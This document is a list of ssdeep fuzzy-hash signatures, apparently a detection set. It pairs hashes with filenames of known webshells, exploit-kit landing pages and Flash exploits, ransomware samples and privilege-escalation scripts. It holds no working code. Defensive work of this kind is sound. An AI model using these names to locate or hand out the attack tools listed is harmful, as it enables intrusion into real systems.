+768:MRfsECckwRWSn2Xrcm5FDfLENvb2EWhMikhd2NI2CvXfi:2PWSn2XLDfL2z2VMikL2q2CvXfi,"image.264"
+768:MRfsECckwRWSn2Xrcm5FDfLENvb2EWGGikhd2NI2CvXfi:2PWSn2XLDfL2z2zikL2q2CvXfi,"image.274"
+768:MRfsECckwRWSn2Xrcm5FDfLENvb2EWFWikhd2NI2CvXfi:2PWSn2XLDfL2z2RWikL2q2CvXfi,"image.266"
+768:MRfsECckwRWSn2Xrcm5FDfLENvb2EWflikhd2NI2CvXfi:2PWSn2XLDfL2z2pikL2q2CvXfi,"image.272"
+768:MRfsECckwRWSn2Xrcm5FDfLENvb2EWdwikhd2NI2CvXfi:2PWSn2XLDfL2z2hwikL2q2CvXfi,"image.278"
+768:MRfsECckwRWSn2Xrcm5FDfLENvb2EWBwtikhd2NI2CvXfi:2PWSn2XLDfL2z21wtikL2q2CvXfi,"image.277"
+768:MRfsECckwRWSn2Xrcm5FDfLENvb2EWBP2kikhd2NI2CvXfi:2PWSn2XLDfL2z21P5ikL2q2CvXfi,"image.276"
+768:MRfsECckwRWSn2Xrcm5FDfLENvb2EWb1ikhd2NI2CvXfi:2PWSn2XLDfL2z2f1ikL2q2CvXfi,"image.275"
+768:MRfsECckwRWSn2Xrcm5FDfLENvb2EWaaikhd2NI2CvXfi:2PWSn2XLDfL2z2hikL2q2CvXfi,"image.256"
+768:MRfsECckwRWSn2Xrcm5FDfLENvb2EW0kxkikhd2NI2CvXfi:2PWSn2XLDfL2z2QjikL2q2CvXfi,"image.259"
+768:M+pvpdoUBk235KI2CxZk0iffhZMhfJLqfDDmD0N+BpJK+WinzQu1QGB4fQkl6qs:/fdoUT3YffYRJLq/m44JK+NzQu1QGMHs,"2017-03-07-Rig-EK-landing-page.txt"
+768:MPkHpz2pzYNYlCdZsj0UwPznRzPglZSNqj86d7Aq9hW0FVdZDg:AkHpz2pzYNY0fsYUOjRP4Kqj86d7Aqv+,"Cmd支持管理员登陆的webshell.asp"
+768:MGSqdTdWO3l1QMkzfEPzsR5DiHeZMXFfngmZrKtx4NJl6/6RGclFArg8AZ:HRr3vQGz2DxGnMwk6RGvsj,"2017-03-02-Nebula-EK-flash-exploit-1-of-2.swf"
+768:mbT5CEIlE2Mpe9XEJ1Y94e40W7WOHY6TW1S:gChL9S3HY7o,"cgi2012.txt.001.001.001"
+768:M5w1Cqv+hmjCeTTN9E3Em4PYCBK475aAt3e81ZFL+x2guNI6ST/F:cHm+hmjCrt4xK47wAtM2guNI6K,"3fexe_by_S3rver.asp.txt"
+768:m55RmOeh+RYfvf69IBsb5hjlLVFDClwoqS207ANF0qE5HwoOpJ9mbl:8mOehQYfvf63lhFmSBS20MD5E5HwoOHu,"b374k.m1n1.php"
+768:lZoXT+qgcXfHVHm4aQ4HezM+d0wYvsGCt2HMdGNvOTFMNIJD:Ml3X/VIBHcM+d0wYkxEMd/,"2017-03-06-Spora-Ransomware-3rd-run-Chrome_font.exe"
+768:l+X4FKYMj8RfJebm/EZ/pgEUQTXUSeANfgLw62PXa:I493umsZhgETXlTgMrPXa,"2016-02-23-Rig-EK-chain-step-1-pavtube.com-jquery.js.txt"
+768:lWAD8zP1GLAXbyYAPbAPLRY97HInzIlsuvGgIo36KS9XkmwwuwOwG5:sADc1GLAeYAT0F8lrQ0BwSwG5,"indrajith-1.0.php"
+768:lTMalG/dQKVawy88U8Y5FerBYQZU+6HfEAv2g:lS/KKV688U8Y5Fer8xM82g,"Jspspyweb.jsp"
+768:lsmwkdVGS0nrjaCqIfFjMIfxR4nD8aBk4WCuwMq+Ut4ZZJC50Hy:CmwkdVG7nrjaCqIfFjMIfxR4nD8aBk4Z,"2016-03-08-pseudo-Darkleech-Angler-EK-after-kidspathwayspeel.com-page-from-compromised-site.txt"
+768:LsbZviI+t4Jc8OeBV1NNIZ+EdihuhUau+DR+8xUd5EigcbnXzZW0aKJ3+6XHfHMd:Lei/zSVx++EdBDR+3tgcbXzZR1HfHMd,"VirusShare_ee13c62dba46923b7b13a745691d1331"
+768:LqeRs4ehAWQqXuo+Kbm153aEGY1721/RukPIxGkdP/4fx:LqeRs4ehALqf+KStGYM1/RzQxGkufx,"r57.zip"
+768:lmbe5vkxXE6P4RutyU35K8UPJazYEggos3cOJMGsj108RKI:GUO44tyq58aOs3ccMjNRKI,"osirys.txt"
+768:+lKtRvn+PA/ZRI70AMXpFnM6KDNgvWhYM1H:+lKjPQP0jXpFnM6ynY+H,"sep16-8.txt"
+768:+LKqRcZJJ3i9kF8AGe93gcgSSw+fhEL5Yc+8tIEAiSLk3Yf/:+mqR4WkFngSSw+fOVW8tIEApoYf/,"miansha.php"
+768:/+LHxb2MCOiG/jolI8BbTYMUajMPFG+mfhIXzJVKQpZQ7oS4Rxu8B8U7rjgv:qbjiGUlDPYM/jr+mfCVKQA7oVxJB8mra,"zorg3.php"
+768:++LHxb2MCOiG/jolI8BbTYMUajMPFG+mfhIXzJVKQpZQ7oS4Rxu8B8U7GooG:xbjiGUlDPYM/jr+mfCVKQA7oVxJB8mcG,"20c84c03dec6d5f4106565d8ffff3cc8_php.txt"
+768:LfPnl6REZCvSEa1fBodEs3m5ZVu7/7dXztF:BN1fBguYzfF,"d7e64300985a2c5ed3064e00e8cced5d_php.txt"
+768:LEwL2OjdTq4d7PbfRnMjPwoJjyvJLihNjKO9b8knkptraOW+XHvNDR:LEd2dTL7PbfRnMjPfjspXR,"2016-06-20-Rig-EK-payload-after-chipdating.link.exe"
+768:lEuwwyC4talJMpe+gC72OSLVZAWOS16MTYYGQeQ5/AVtM6jO:lqyuI+gC78V+S16MTPRjCM6C,"x7.txt.1"
+768:Lel4sPgFbJ6tDygVNH5sjYNMM10utPEwkNQ003CyjseA:2VNH5sjYNMjVNKd8,"Backdoor.ASP.Gxgl.a-QLX.asp"
+768:LDsxqgcXfHVHm4aQ4HezM+d0wYvsGCt2HMdGNvOTSMNIJD:v3X/VIBHcM+d0wYkxEMdQ,"2017-03-06-Spora-Ransomware-1st-run-Chrome_font.exe"
+768:l3AoJt0MUoIaecFfRPfmIvV5yYgd0g+GZDDN5fKhLdMGFSlw7S3V:tAoJdU5advV5y50gF1pKhLXFSy4V,"2016-03-29-pseudo-Darkleech-Angler-EK-flash-exploit-after-wefitsolutions.com.swf"
+768:kUL4c8OxwyQRxMK5KDbeoq9w21CxXauHRyqN3O0uudq+BaiIDonLRfCKF+3N:j1YyQDiK9wCoauHRy+3O0uO/Ba1U1Y3N,"2016-08-19-EITest-Rig-EK-flash-exploit.swf"
+768:/ktSK9yoR3XsADDePjrLJ73EzPrGzwMUFx2Npsmjwyi4Kvt2:/rLf0AN73KWpi4Kl2,"2016-04-06-pseudo-Darkleech-Angler-EK-flash-exploit-after-latchamgallery.ca.swf"
+768:klLHEo8iKEdq/jX3ax2AtqD9FLSL0jWkdIlkEfU93CFhJuIU4iMENRbZZ:q8Ic/jqx2rD9FLtW893ehrU/9Z,"dk.txt.001.001.001"
+768:KHLVvtIHAM0oFz2VM15/wUoGcea7LkCWTboZuApdXoSAZr5KMQgZnI+12BN8n3:KrVvaD0oFiSPVoGcXLkT6uYw4+nI+263,"2016-06-20-Sundown-EK-landing-page-first-run-with-IE11.txt"
+768:kgWEmoR9E22JIoI/j2spIThty+siayQhXzwkgPwx/FPmng/2HK2QI17/TKxhYboi:bp2RNtNROiXj3LiqRLESz0sj,"list.php??"
+768:Kf8FrvF+/kTTJRn8o4mUYPHKP2MPZ5iOw1zbpkjKbhmF0MYSj0p2WuDiAIGPILSf:K0Fgu3IRZ50a/xeC,"2016-06-30-page-from-4county.org-with-injected-EITest-script.txt"
+768:kattqIts5xM7SSqQecC/DndrW/+K1u2qiULdTe:kaftsE7SSqQHCrdrwp,"phpspy_2005_full.php"
+768:K2LiDJzYx66VmB3HzhoxpeTfYp7iKSg4OcdK:ziVAVeryB,"tryag1.txt"
+768:K2LiDJ4Yx66VmB3HzhoxpeTfYp7iKSg4Ocd7:ziOAVeryy,"tryag.txt"
+768:JvKjPySOS2Krhht1tEjZQ0cjt/+MiLBqtBD+0/wutPOqRGwFF5FhAT:BKjPdOPK1WQxjV9iLctF71j/5FhAT,"newsh.php"
+768:jukB3wXWXz9R5EgWdaagpMgQqctOjvfGxSEnl4CUz1NWoifIr+yXEbuGUrpV9+:juku4z9RadyAqQOmjm3difIC/buGUr4,"2015-08-13-Angler-EK-flash-exploit.swf"
+768:JuF79mou3A5Kx4xVePw5yYgd0g+GZDDN5fKhLdMG5M:JqmouyxVSw5y50gF1pKhLX5M,"2016-03-24-pseudo-Darkleech-Angler-EK-flash-exploit-after-macfly-studio.com.swf"
+768:jU81pywZRAb9m1I2ED0CHmP7K06w7Sh5tUcfYek8Knwq5+b7pOCZ/PmY1If:PDzLPWKSh5tUcfYekxub7ZZnmY10,"job.jsp"
+768:jrTZkQbtiCbDy0r3LnT0QvZ9IA4yCPa7Jo:+QcCbDWQXIU4a7m,"cvs"
+768:JpmAJojdH4WIbLvk7vWMXerJDIZSsshZSAp06+BJuGZrQfCfyfW:JwAJCALs7vWieVDIIhZsjHBUCKfW,"mod_joomla_shell.zip"
+768:/jnfgO1QImIsI2uPmEDCAWT0bDNHR4QIKqjBdiVK:/j31QI12uPmE0aDRqjBd+K,"C99madShell v. 3.0 BLOG edition.php"
+768:jJ9ixeSHRTNTmCEb3TBDZMeNIGIrUjJa1Wpf5vUSJZz+hkC:jJ9ixPyb3PMPgjJ8aRsS3+hl,"2017-02-26-pseudoDarkleech-Rig-EK-landing-page.txt"
+768:jfvp111yNy+TCdun0m4BfcZ7JYos+eFYXSJ7Iff3ATc8nNCvjaj0ogmAkxNLrOtM:jfX/afLnZ4BfclJNL2i07IH3Ag8NCvmb,"0d4ceec2a23a3b356a8ef5e7f8b7b573_php.txt.orig"
+768:JfPnl6REZCvSEa1fBodEs3m5ZVu7/7dXztH:rN1fBguYzfH,"neewsfeed.txt"
+768:jdainqluDnN0+0Fca64ZsnqaxcSsDKLct/skrOacN6JssHMLeXBO6BT2da:jQOnN0+0Fca64Z2gOa,"ekin0x.php"
+768:jCtJx9C7Pjx7FqVHNNiFOxIA5FqwCW6YeszjQE8kxh/ED9H03jl+Gr:mtT96xBgN5xjqwb6fszjQig2xj,"2016-08-10-Magnitude-EK-flash-exploit.swf"
+768:J4PKQ/iNYEUI6My66Uy0GwwxMeY3oM/nI5G+0rko7v0C52kIO:RrNNU1y6pxMeY4CgBto7v0nO,"fx.zip"
+768:j0OGqQDMLDza8gYM8pzFerEhVcNSCgmHHq2X:4YLDzHhM8pzFer1d9K2X,"Jspspy web~shell V1.0 ※MADE by 孤水绕城 QQ540410588.jsp"
+768:Ixde/eIfWCmEX97SU4D0JU3O5BJFOIcW4+5dJo3/C1MyYUT:0d6eUHm6954o+O9FgWve3K15L,"dd61bcdf29e557ec78ffe765c8a963f5_php.txt"
+768:IU81pywZRAb9m1I2ED0CHmP7K06w7Sh5tUcfYek8Knwq5+b7pOCZ/PmY1I3:eDzLPWKSh5tUcfYekxub7ZZnmY1K,"520.jsp"
+768:isgPAWhH9Yn77UDnZ9JMwefGzvq+M9YsEqdWZw+dUekxZLN9+G2fUMmvGSq+N:TgPJ27QwcqpYsEqdAndUekxZLN9+G2Mx,"Backdoor.ASP.Ace.ai-zehir5.asp"
+768:+IMG1zXtwfLSkUN7F37nqiGC+/OMHBk0672O8V05ELWLnswym9:+ID1zXufLsVF3LqifMHBkH9mLInRym9,"reDuhClient.jar"
+768:Im1A7PvNbKzidlVY59kbKzidlVY59kbKzidlAmVLybKzidlVY59+lSd05hLYVPIY:31A7PpKr5UKr5UKu6Kr5U4dpDGV48E,"Chrome Font v8.72.exe"
+768:iLyQWeYQeY2gGbkNVSzepXuf3kzgJoXSQT1Vfu7nKA1d2Pu1:YntbldgEgJoXSQpVm7nKA1d2Pu1,"2016-01-04-page-from-compromised-website.txt"
+768:IEuwwyC4talJMpe+gC72OSLVZAWOS16MTYYGQeQ5/AVtM6jO:IqyuI+gC78V+S16MTPRjCM6C,"elements1920.php"
+768:icx4qRcv02MnL23JQVNyNyZ4TAprVMHt1j:icx4qRcv0/iUNy8KTAJVM1j,"2016-04-11-page-from-condocosmetics.com-with-injected-pseudo-Darkleech-script.txt"
+768:I61CzZphjdG79BF80a2188/TSJnj04mAoXl7NoxFS6kGD+G8:FMxdyBFSe/eJnj0hAWVN8S6kGSx,"b374k-2.1-obf.php"
+768:i51WRmBYwqQ5CZhGzfrWW1YINHhZya7uzaZQzJfqVv:iTSwcGzfrrqW7uzaZQzWv,"shellzx.txt"
+768:i51WRmBYwqQ5CZhGzfrWW1YINHhZya7uzaZQzJfqVa:iTSwcGzfrrqW7uzaZQzWa,"shellzx.php"
+768:HzruqRkXgp0pvwyCbA1dM6Ry5z8/N2nXfrl:Hz4XLpvwyCbA1xJQp,"b374k-2.2.min.php"
+768:HxUxBs9UtLt+/q17hioydwXwaQrqr+K1u2qiULdTds:R+s9at+/qZhRgaQrcp,"PhpSpy Ver 2006.php"
+768:HWUxBs9UtLt+/q17hioydwXwaQrqr+K1u2qiULdTds:2+s9at+/qZhRgaQrcp,"phpspy_2006.php"
+768:hu8F3sq80nFfVsZRtlouiiGC86XVhPRjFUXOks8UBugZTCxI0libdHpkUBcJif8R:9FJ2v6js8UhTCxI0libd6jl,"Nix_WebShell_by_DreAmeRz.v0.5.php.txt"
+768:hu8F3sq80nFfVsZRtlouiiGC86XVhPRjFUXOks8UBugZTCxI0libdHpkUBcJif8I:9FJ2v6js8UhTCxI0libd6js,"NIX_REMOTE_WEB-SHELL_v.0.5_alpha_Lite_Public_Version.txt"
+768:Htx+VCOJ79WfR2BeZxqPwXBsgfN7ewqz4oIWM22fnsdG0YKUqXKSRCA2tEu4GB:+VAGehnsdGjKUqXaLCu4GB,"poxy.php"
+768:HrgVy4eAeUXPG+3GYaMsxk8FYF3FO/JgFgLlDSo2SlbbQ2t8IPgzGy:LgVyRAzGDMh8FKOxg2DSoLlww4zj,"2016-06-01-Rig-EK-flash-exploit.swf"
+768:HloLqevqEVlmlPPgndi0bFgLlDkHTDLh2xGsv/aZ2BrTLb+Zmzv:qJvqEVqAdx2DkLcv/acLPb,"2016-05-25-Rig-EK-flash-exploit-both-runs.swf"
+768:hLo9yF2mv0hib0Xneyt9nn1xmjYS4H1rS2aw:GC2mciyxpIjYtH1rSE,"2016-05-31-page-from-ampmworld-wide.com-with-injected-pseudoDarkleech-script-second-run.txt"
+768:hLo9yF2mv0hib0Hkwu+uyyzGm0orde40B1r2:GC2mciSJuRzN0orQ4c1r2,"2016-05-31-page-from-ampmworld-wide.com-with-injected-pseudoDarkleech-script-first-run.txt"
+768:+HHCV7sxRQ5S8qeLReA++GEEJt+GkWJJl+Gtf+Gx3+GEwl+GrCy+Gjy+Gc0+G8Ly:+nCV7sxRQ5S8qeLReA2bpXysq7oG2a2y,"2016-02-10-page-from-www.sustainablebrands.com-with-injected-script.txt"
+768:HEuwwyC4talJMpe+gC72OSLVZAWOS16MTYYGQeQ5/AVtM6jO:HqyuI+gC78V+S16MTPRjCM6C,"8eOo414Br2i7"
+768:HEuwwyC4talJMpe+gC72OSLVZAWOS16MTYYGQeQ5/AVtM6jA:HqyuI+gC78V+S16MTPRjCM6s,"VirusShare_5410303e916695e07e71854c51a63df2"
+768:he0+2BUwiEEUUd/0xHwOEFlZaJLBEhyAm916rOYIg5dQsO2Sut/yi:h/wYGd/IwOUIJGwN9OVUn2Sqyi,"XMLRPC.class.php"
+768:hCb2FFGw0EHkF4dIZg+W69GO5UNnqBbYRs0EfmpnkflO:zS9EHkFSIZG69GO5uqBShEYnkfM,"2016-06-17-page-from-nuvon.com-with-injected-pseudoDarkleech-script.txt"
+768:hABR3TWNdn3J7DbSnX74DzO5g9ycPzTP1EkQmIwB8l:hm613JnOXszn9/bio3o,"44290.docm"
+768:h9RAoPVJ0ZwIZQUxYsPtXNAti2GJU4W6dbJAoI8Xwww6r1M5:3R9yqIZQUCsPtXNA42GLdlAog6r1M5,"2016-03-29-pseudo-Darkleech-script-from-qtiipqeyb.hopto.org.txt"
+768:H7VCe9GY/TCPyQrEvL6ZxleXJYTen+UUs:HJCIGY/TlQ4mZaJYTop,"conf_m46.php.suspected"
+768:H1A7hWp9YW/X+kyYHU6qrqL4cQbOVoKkmfV65Z:HKdKeBv60qMcoKkmfV6,"2016-04-18-EITest-Angler-EK-flash-exploit.swf"
+768:H0CGEOoePsSu85w5HLS+nPpcQyzXN6tCKghI+shhMYpgqjxZxRNvk/lcUrY4:USL19PpcQQXN6tCKmIp7MexZxRNvktcU,"2016-03-29-EITest-Angler-EK-flash-exploit-after-ekalavvya.com.swf"
+768:GYyArGuYoGpHa3M+OZNrCz1oJUyHjlcw4Ex4BGcBhA/RphPbGgx:GMpYLpHa3MbZNM+Uyjlcw1iBGcBhMPCk,"4.jpg"
+768:+GxbtDB2IDa10ljNh35M4wzda/fm8rE2NyE+BZY:TF5Bja1b4wZa/kG,"2016-05-16-EITest-Angler-EK-flash-exploit-second-run.swf"
+768:Gv+DuNKvDdqUBZRAj7FfZ7tVaIXeODXGH55uwU:GQuovDdqUBZRUPZVaIqI,"2016-06-17-page-from-ex.technor.com-with-injected-pseudoDarkleech-script"
+768:GuCkEH9ApB18iW5+vKqkvF5FBxokD+PjCX2qhh9jbFGUQzqxRLhock9xwrjXs7Mr:dc838iVk9zBqkCOX2EkUQYXk9xax19zD,"b374k-2.2.poly.php"
+768:GS/nYqREvzeSpZsrpccEvKyaoHpE1rfMeSexeueGereveze/eDoFaf0Su2uVupIs:8viSpEnjMn4rbIG80nkMEUQLqwqWWuv7,"2016-04-26-page-from-quilty.ca-with-injected-pseudo-Darkleech-script.txt"
+768:GRu9WlCqUamgkR/oUYIliLkfVmsLLUeajOtc0/r44w1nAd:Uu9WNUaF4QpwdmZMtcw,"20160131-095247-Vq1Mz2juZ1YAAEe@6d0AAAAE-file-pSubfr.1454197967_1"
+768:gp45XGAtnBKpNRqo+jD5g2CD8hcJ2FOWHjKf2ajlgV7RN5FY:fGGnIp2DVSwhU2gWDKfFlYXo,"bee83beb0375ed9d270e051519c808f7_php.txt.orig"
+768:glzRoNvZQsGb1w8BY1lzYJeXkvVaPof3Nem737OqkWzubhLDU3DrDDqHDZrbJ6Jf:gngGb1w8BY1lzYJSkvVaPoNemD7MrbJw,"干净清爽的大马，不怎么好用.aspx"
+768:glRaDIk3z2Q2X4Vm+kltHybVcAmJVD7DuT7/ral40JV0axA7AgOIOejpiWKQyYnC:gXgIk3goYtsVrqzs2lkaqhOIOCTXG7,"2016051523132374985.png"
+768:GiK+ugcT3mwJ2B23Rsdpxpnd1RPkyiNEJZTOmqJ:G9+xw3mwJ2BzX31RPkNeJZTOmqJ,"crimecyber.php.36"
+768:GiK+ugcT3IYZ9jya37u7JqNd1RPky+d3JZTOm0:G9+xw3IYZly41RPkZNJZTOm0,"crimecyber.php.37"
+768:gHd3jXcITG/RpWLyjV8wsT93LEY29ssKfMTNO2OcrQemX4rM4Jr:ejsITG/qL0LspYfKIocr7mX4rbr,"2016-06-02-cbat.or.kr-logo.swf"
+768:gG6ySrYcmtahAJ68fkC0e5FYn3D6jZcIC2xqYtjcpkfUD+gbI5WQXXD0EDG:Pir7c68f3LYnT6jZp/IpY2IAqYJ,"0a32be4ecb0b1c1902250b1631cb9258_php.txt"
+768:GFTyGIVzyLYgIHNBLFsnvqY4Qj8hcu0Uo:GFTyGepHNJFsnvqW,"www.php"
+768:GChceyPficjJDNGrERGqCc/rQ4excbRyMv+eP0DNMgzvHhjaKkcAzZH4J7B:GChceyPficDNExc/7FNH2NLzfhscAzZ6,"20160131-113613-Vq1lDWjuZ1YAACyiZ4kAAAAg-file-5C42hq.1454204174_1"
+768:gaDa8slj6CsE7+SgnSc4+veJqaHb6yBXvQCKqWvTsys4Y/gROLDv0GVFUmhMNmLN:gaDa8sx6CsE7+SgSc4+veJqEb6yBXvQy,"2016-02-03-harbourfrontcentre.com-index-page.txt"
+768:Ga8Vy0mQiLvWvDSaEZGHeT98B6riiwQnRcjR:GKxBWvDSaEZGHe5VW4Rcl,"ha.jsp"
+768:g3Xt+3/9lQdG6ySrYcmtahAJ68fkC0e5FYn3D6jZcIC2xqYtjcpkfUD+gbI5WQXW:U9moIir7c68f3LYnT6jZp/IpY2IAqYJ,"bcf7495e6ca4efdd5ab1d0bcbe7e922a_php.txt"
+768:g1mrLgibQt4OtQtZAWHcfoWjBurlLFwLR4ov:RrLgiknjCNF4Wov,"WebShell.php"
+768:G08VypHGIUnHWaxSXEpqHek8sI1GzyYlKE4vjp:GApmfWaxSXEpqHekknE4vd,"ma1.jsp"
+768:FX5lM3AgkzDJ6JAQThPLuq3RqypWMGgt2:FYQVCvThqqBqypLGg8,"5ad994747dcb67a113a702116612f4f3_php.txt"
+768:FWJ9CxRC0xNm02LCMZuA0b866nkTO930a7Fwy8sq2Pj0Zqg1FcsvYkMD:w96m366nkTO9kaeeP0q,"phpspy_2009lite.php"
+768:fWiH7gYgXcw+2rf4Ygj5YDaAnKj8fGfD+Mz4CbdomLSVzPKpV1p/34Gsp4U:fWiHUsSgIax8+L5z6mLCSrn34Gsp4U,"2017-03-02-Nebula-EK-landing-page-1-of-2.txt"
+768:fuCkEH9ApB18iW5+vKqkvF5FBxokD+PjCX2qhh9jbFGUQzqxRLhock9xwrjXs7Mr:Wc838iVk9zBqkCOX2EkUQYXk9xax19zD,"b374k-2.2.poly.php"
+768:FrFaq/A2b0wWB8IPDrbx85ofStLXsp1IdUyQ68zAwgzmi12cToZLaKFcS:JX/9Vwbx85ldQpzAwgyC2XgiV,"boto.php"
+768:FpT8+vA/F+OxCDy1L8zWHdzD/xMm/f7+CiA:F3Y/EOxCDy140dzDpMif7+bA,"Antichat Shell. Modified by Go0o$E.php"
+768:FpH/ngR1gZf+UEj2gnuztqo5vrmyUdqh5gktceFqeF3v51U6dQkdUh9:FpHoIklfnNo5vrJldHFqSv51/NdUn,"bad_shell.php"
+768:FnCoreOsgQpWSvuqWaD5nqQmI6y9ssKfMTNO2OcrQemX4rM4JD:FnCoCqrSvuqXD5v76yfKIocr7mX4rbD,"2016-06-02-98.126.83.188-port-82-logo.swf"
+768:fmzPZb2/Gyt8vl+/Amb2SeyC78dEjbXjo3uApdXoSAZfsqa4KMQgDf:fmzGGIWTy3KjbUuYwfsz4f,"2016-01-28-Rig-EK-landing-page.txt"
+768:FLPXnuUZ/2KoR0w2i3PVmg0oKEoEDHQ5r4Pi408rz0LLg09bYdPnwGPLTNu5:FLPXu8/2KE2i3PVztVoEU5r2308cLpxd,"xiao.php.txt"
+768:FHGfA8VqOF31fVhqjhYNGA42SnmTFP4XpF1+90lHOSYy0:8fA8Vqs31faVnA42Snq90lHOSYy0,"hxpshell.txt"
+768:FHGfA8VqOF31fVhqjhYNGA42SnmTFP4XpF1+90lHOSYs:8fA8Vqs31faVnA42Snq90lHOSYs,"iMHaPFtp_by_iMHaBiRLiGi.v1.1.php.txt"
+768:FHGfA8VqOF31fVhqjhYNGA42SnmTFP4XpF1+90lHOSYO:8fA8Vqs31faVnA42Snq90lHOSYO,"hxpshell.php"
+768:ffPnl6REZCvSEa1fBodEs3m5ZVu7/7dXztH:lN1fBguYzfH,"greed.txt"
+768:fEynuEZ4+no6KoCkVc0mFDCvYNzaiSR9PPR/Fospf5J05zq4X21C2L:MyuEZ4+nRXmwYNzmRz35J05zq4XM,"cmd.php"
+768:f8z7nEUEWOCjiyt8vl+/Amb2SeyC78dEjbXNkI+9qrdBdAwgSC4:f8z7EjGiIWTy3KjbyIsW,"2016-01-18-Rig-EK-landing-page.txt"
+768:f6qhkF5BzpoxvNLmIx4W5WdTWdWgneGLBj2R:fA5Bzpox1LZx4WAAcgneGLBj2R,"Invoke-MS16-135.ps1"
+768:ExtLss9nuLK15ktc1VaiDO+K1u2qiULiTJM:WLss9ngK/ucXaiwa,"ArabicSpy.php"
+768:EvXDJ1z8mM6BvbDYIyFoBe2fGKKc6VXq1sQpM0YcVaFbb5yAsUEIjvi4o/Ndz4I7:EvXD8Cc7onGKnCobpMn+aNb5ycjvi4oP,"id.txt"
+768:ETgpISqgCkcZlrszxsixaZ8XFfUXEdPu5oNvG/w5oqMXr069f1:0l3rszPxaZ8XqE5QyJyqMXrf,"2016-08-18-pseudoDarkleech-Neutrino-EK-payload-CrypMIC.dll~"
+768:+eS+SgiZUWooUnKS+yzGw/EQlW8kDfOFKV3d7o4qVl:K+7SUDoUnb+mEQE8hKV3d7rg,"2016-02-15-page-from-www.rcp-vision.com-with-injected-script.txt"
+768:ERu9WlCqUamgkR/oUYIliLkfVmsLLUeajOt9OqkLiJfKCRnwffxA:+u9WNUaF4QpwdmZMtYqvJCCSW,"20160204-221042-VrM-wmjuZ1YAAGm-XqIAAAAN-file-EPYSRu.1454587842_1"
+768:enPalFbQvJycmJDjfei/MAfxolowZMl1joVTjjjai3sh:RlFbQvUcmJDTP/MAfxoXZMlwjjai3sh,"hxpshell2.txt"
+768:eijyhw5bNZUlxBgoFzVRv/vw6YO/XCRknXPfq9J2h:eFhwB7iXgqzD/vhYO/SRknXMJ2,"2017-02-28-Rig-EK-landing-page.txt"
+768:EaxOzmD2z8Zw8B5fy7QRNEvPBANejFGrzNJqQxvLJ9Tp8We/uo07QxRIefZw8i2s:TO38/r,"2016-06-30-pseudoDarkleech-CryptXXX-decrypt-instructions.html"
+768:E6NvnOgoAqO0LidHCD6j6IcFrvwjJSkBMlq/c2FekDSaU:E6VBdgeiuj6IcVvwjUkBMlq/cKTDdU,"Backdoor.ASP.Ace.ag-海阳顶端网ASP木马XP.net欧阳逍遥版.asp"
+768:DZKBDej4Jd1N8OF0SZoeqIK8oXr2Yb7HU7qO6Po3e:DoReMX8OF0EBGXiYb7OqLg3e,"phpspy_2010.php"
+768:dwpsK8zlI8KQbRkzjalZrT/OIyFJVGN8g9oUHVqCGzXo00SWcb+0j:CpsPlI8vRkzjalZrT/OIyFJVGN8gmUH8,"list1.jsp"
+768:DWB16qtHhCYBrMKn85WPY5Fwfq2VwvzevN5Rw+r6nK:DMBs5WPmkOzelP6nK,"Invoke-PsUACme.ps1"
+768:dvF3Oom4mR04YmolqO9CEAugI1SZARjZVapa3DPlUzKO9pLE:1Iff0f1lqUrgIVRdVapmDPuxpLE,"b374k.php.php"
+768:DTJC7sJje3PX9TaCD/I0Iz3KL02aT51/vxnAizU7vSro9Ovsbq+EVLOaih3i7Yq4:DT87sJje3PX9dImL0HT51FAi47vSro9N,"2016-03-09-page-from-deathanddesire.com-with-malicious-cript.txt"
+768:/DsxqgcXfHVHm4aQ4HezM+d0wYvsGCt2HMdGNvOTeMNIJD:L3X/VIBHcM+d0wYkxEMds,"2017-03-06-Spora-Ransomware-2nd-run-Chrome_font.exe"
+768:drN+Al1iLYLaT41HWYnZGsaipMCtXkmKk0E1y:BsAl18YLaT4126MCtX3Kk0Uy,"Antichat-Shell-Isis_mod.php"
+768:Drlz97yNTKn2yVxTmisn2PB2BJVnyBPjTcMk0JRYA2zk1gfDn0s8OOapu:DrlB7yNTKn2yVBmFn2p2BJVnyBX5AA2M,"php_include_w_shell.php.txt"
+768:Drlz97yNTKn2yVxTmisn2PB2BJVnyBPjTcMk0JRYA2zk1gfDn0s8OOapr:DrlB7yNTKn2yVBmFn2p2BJVnyBX5AA2Z,"php-include-w-shell.txt.001"
+768:dnwBHHHIS8srNqbrW6QP1m9BKLxvMGRm/8j/ivI:xwBHHHX8srEW6u2BKLxv3RiKqvI,"2016-06-15-Sundown-EK-flash-exploit.swf"
+768:DN1mpRsJdLc/ZRZeyFL0Xtizus5AHwAZ074XD/XIDlpoxizhW/LlISu5AU:DWpeJdQbq9apSLvU,"itsecteam.v2.1-chinese-ver.php"
+768:DN1e9GaLc/ZQZeyFb0Pt4zus5AHwAZ074XD/XIDlpoxizhW/LlctSu542:DwGaQMylkpSLyw2,"jHn_Backdoor.v1.0.php.txt"
+768:DN1AZRs2aLc/ZQZeyFb0Pt4zus5AHwAZ074XD/XIDlpoxizhW/LlctSu54U:Dee2aQMylkpSLywU,"ITSecTeam_by_Amin_Shokohi.v2.1.php.txt"
+768:DM7b797ERqGJ5onjIYu02T3oDr7Pbj+QtiGGlrjbiOTc77odPP:DMflEAGHojIN0R+QtiGGlrjbiOTc77oJ,"2016-07-15-page-from-encouragingbibleversesabout.com-with-injected-script.txt"
+768:di4/G1IwvuW3IN3cukvE/5GnU4BXKFzfFQMMAiC7jJv:4CG6dWYNsg/AUrfAXW,"20160206-143623-VrV4R2juZ1YAAD3lEFsAAAAQ-file-TXE0Bv.1454733384_1"
+768:Dh8b95bFywgJxjfeWRMkLcdxoZ+hDmJSdrb1rJ4dN3KTs3d:Dh8bDbYwgJxT1RMkLcdxogDmJfpKTs3d,"dd.txt.1"
+768:DEQ3MImHjCK9RLxZ0ba3MGS5giEmNSy/ZmS5bkouSKJAIxJn0:bMImHjCEQe3MGJiEy9ZmQkFzAIxJn0,"dya.php"
+768:DeoO1OYiBi0QPIV3adrIIxBwtu1n2PUt6Kcx31OG4mQ/t7Jy3CRFq1ihBAmg518p:WVeqa2ciGHmt7JD/q1i7g5rWfT6h7Q,"r57 Shell.php.txt"
+768:ddytkhjPsInxx02GVRjXL2jH+3WxUEI4dhv:dB7sIxx0DLST+3WxC4dhv,"2016-03-24-page-from-macfly-studio.com-with-injected-script.txt"
+768:DdCRp2Y5jxlg5+5/f4HyKML/3g9p00ZRBmi1tC7KgWbeh1D4xQpd:DdCLX5jxlh34HyTLI9p0KB1tJ8P,"conflg1.php"
